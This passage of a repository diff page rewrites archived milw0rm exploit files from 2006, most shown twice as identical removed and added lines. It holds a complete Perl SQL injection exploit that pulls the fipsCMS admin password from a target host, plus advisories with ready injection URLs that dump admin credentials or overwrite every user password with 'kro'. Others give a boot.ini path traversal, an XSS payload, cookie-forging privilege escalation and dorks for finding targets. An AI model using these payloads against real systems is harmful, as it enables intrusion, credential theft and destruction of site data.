exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
|
||||
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target HTTP/1.1\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
*******************************************************************************
|
||||
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : 29 Euro
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
|
||||
|
||||
See you Admin Hash..
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
*******************************************************************************
|
||||
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : 29 Euro
|
||||
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
|
||||
|
||||
See you Admin Hash..
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
*******************************************************************************
|
||||
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
|
||||
###http://[target]/[path]//default2.asp?kat=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
*******************************************************************************
|
||||
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
|
||||
###http://[target]/[path]//default2.asp?kat=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-22]
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
*******************************************************************************
|
||||
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//details.asp?id=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
|
||||
|
||||
=> All Password Changed to "kro"
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
*******************************************************************************
|
||||
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]//details.asp?id=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
|
||||
|
||||
=> All Password Changed to "kro"
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
|
||||
# Author : bolivar
|
||||
# Dork : "This script created by www.script.canavari.com"
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
|
||||
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
# Just for Fun!!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
|
||||
# Author : bolivar
|
||||
# Dork : "This script created by www.script.canavari.com"
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
|
||||
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
# Just for Fun!!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
|
|
|
@ -1,32 +1,32 @@
|
|||
**************************************************************************************************
|
||||
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
|
||||
# Author : ajann
|
||||
# S.Page : http://www.rot.dk
|
||||
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
|
||||
# Greetz : Nukedx
|
||||
**************************************************************************************************
|
||||
|
||||
Cookie
|
||||
----------
|
||||
|
||||
Open the Cookie Editor=>
|
||||
Find cookie informations.
|
||||
Change Informations=
|
||||
|
||||
Cookie Informations:
|
||||
|
||||
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
|
||||
ASPNUKE14%5Fpseudo , pseudo => Login UserName
|
||||
ASPNUKE14%5Fpseudoid , pseudoid => UserId
|
||||
ASPNUKE14%5Femail , email => User Email
|
||||
|
||||
Save and go to default.asp.
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
**************************************************************************************************
|
||||
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
|
||||
# Author : ajann
|
||||
# S.Page : http://www.rot.dk
|
||||
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
|
||||
# Greetz : Nukedx
|
||||
**************************************************************************************************
|
||||
|
||||
Cookie
|
||||
----------
|
||||
|
||||
Open the Cookie Editor=>
|
||||
Find cookie informations.
|
||||
Change Informations=
|
||||
|
||||
Cookie Informations:
|
||||
|
||||
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
|
||||
ASPNUKE14%5Fpseudo , pseudo => Login UserName
|
||||
ASPNUKE14%5Fpseudoid , pseudoid => UserId
|
||||
ASPNUKE14%5Femail , email => User Email
|
||||
|
||||
Save and go to default.asp.
|
||||
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-25]
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
|
||||
# Author : bolivar
|
||||
# Dork : "SimpleBlog 2.3 by 8pixel.net"
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
|
||||
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
# Just for Fun!!
|
||||
|
||||
# milw0rm.com [2006-11-26]
|
||||
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
|
||||
# Author : bolivar
|
||||
# Dork : "SimpleBlog 2.3 by 8pixel.net"
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
|
||||
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
|
||||
|
||||
---------------------------------------------------------------------------
|
||||
# Just for Fun!!
|
||||
|
||||
# milw0rm.com [2006-11-26]
|
||||
|
|
|
@ -1,39 +1,39 @@
|
|||
*******************************************************************************
|
||||
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
Login Before Vulnerabilities.:
|
||||
|
||||
|
||||
[[SOURCE]]]------------------------------------------------------
|
||||
|
||||
http://[target]/[path]//getfile.asp?filename=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//getfile.asp?filename=../index.asp
|
||||
//getfile.asp?filename=../../../boot.ini
|
||||
|
||||
[[/SOURCE]]]
|
||||
|
||||
|
||||
[[XSS]]]---------------------------------------------------------
|
||||
|
||||
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
|
||||
|
||||
Example:
|
||||
|
||||
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
|
||||
|
||||
[[/XSS]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-01]
|
||||
*******************************************************************************
|
||||
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
Login Before Vulnerabilities.:
|
||||
|
||||
|
||||
[[SOURCE]]]------------------------------------------------------
|
||||
|
||||
http://[target]/[path]//getfile.asp?filename=[SQL]
|
||||
|
||||
Example:
|
||||
|
||||
//getfile.asp?filename=../index.asp
|
||||
//getfile.asp?filename=../../../boot.ini
|
||||
|
||||
[[/SOURCE]]]
|
||||
|
||||
|
||||
[[XSS]]]---------------------------------------------------------
|
||||
|
||||
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
|
||||
|
||||
Example:
|
||||
|
||||
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
|
||||
|
||||
[[/XSS]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-01]
|
||||
|
|
|
@ -1,28 +1,28 @@
|
|||
*************************************************************************************
|
||||
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : $2,499
|
||||
|
||||
*************************************************************************************
|
||||
|
||||
|
||||
[[SQL]]]
|
||||
|
||||
###http://[target]/[path]//login.asp=[POST SQL]
|
||||
|
||||
Example:
|
||||
-> All User UserName And Password Changed "kro"
|
||||
|
||||
// login.asp UserName: ';update login set password='kro'--
|
||||
// login.asp UserName: ';update login set loginName='kro'--
|
||||
|
||||
[[/SQL]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-09]
|
||||
*************************************************************************************
|
||||
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : $2,499
|
||||
|
||||
*************************************************************************************
|
||||
|
||||
|
||||
[[SQL]]]
|
||||
|
||||
###http://[target]/[path]//login.asp=[POST SQL]
|
||||
|
||||
Example:
|
||||
-> All User UserName And Password Changed "kro"
|
||||
|
||||
// login.asp UserName: ';update login set password='kro'--
|
||||
// login.asp UserName: ';update login set loginName='kro'--
|
||||
|
||||
[[/SQL]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-09]
|
||||
|
|
|
@ -1,30 +1,30 @@
|
|||
*************************************************************************************
|
||||
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : $8,000
|
||||
|
||||
*************************************************************************************
|
||||
|
||||
|
||||
[[SQL]]]
|
||||
|
||||
###http://[target]/[path]//ProductDetails.asp=[SQL]
|
||||
|
||||
Example:
|
||||
-> All News Title Changed to = "kro"
|
||||
|
||||
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
|
||||
|
||||
-> Just NewsId Title Changed to = "kro"
|
||||
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
|
||||
|
||||
[[/SQL]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-09]
|
||||
*************************************************************************************
|
||||
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# Contact : :(
|
||||
# $$$ : $8,000
|
||||
|
||||
*************************************************************************************
|
||||
|
||||
|
||||
[[SQL]]]
|
||||
|
||||
###http://[target]/[path]//ProductDetails.asp=[SQL]
|
||||
|
||||
Example:
|
||||
-> All News Title Changed to = "kro"
|
||||
|
||||
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
|
||||
|
||||
-> Just NewsId Title Changed to = "kro"
|
||||
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
|
||||
|
||||
[[/SQL]]]
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-12-09]
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue